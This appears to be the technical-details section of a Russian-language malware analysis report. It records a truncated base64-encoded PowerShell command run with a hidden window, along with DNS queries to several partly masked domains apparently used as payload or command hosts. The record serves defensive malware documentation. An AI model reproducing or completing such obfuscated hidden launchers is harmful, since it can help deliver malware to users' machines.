Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABKAHAAagB3AG8AbwBtAHMAcABkAHgAYgBsAD0AJwBNAG4AbABwAHUAZQBmAGgAZgB4AGkAJwA7ACQAWQBlAGMAaQB6AHkAZwBiAG...
- DNS ASK ym##s.cn
- DNS ASK vi##p.ir
- DNS ASK om##nt.ml
- DNS ASK pr##ham.org
- DNS ASK pr##.com.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABKAHAAagB3AG8AbwBtAHMAcABkAHgAYgBsAD0AJwBNAG4AbABwAHUAZQBmAGgAZgB4AGkAJwA7ACQAWQBlAGMAaQB6AHkAZwBiAG...' (со скрытым окном)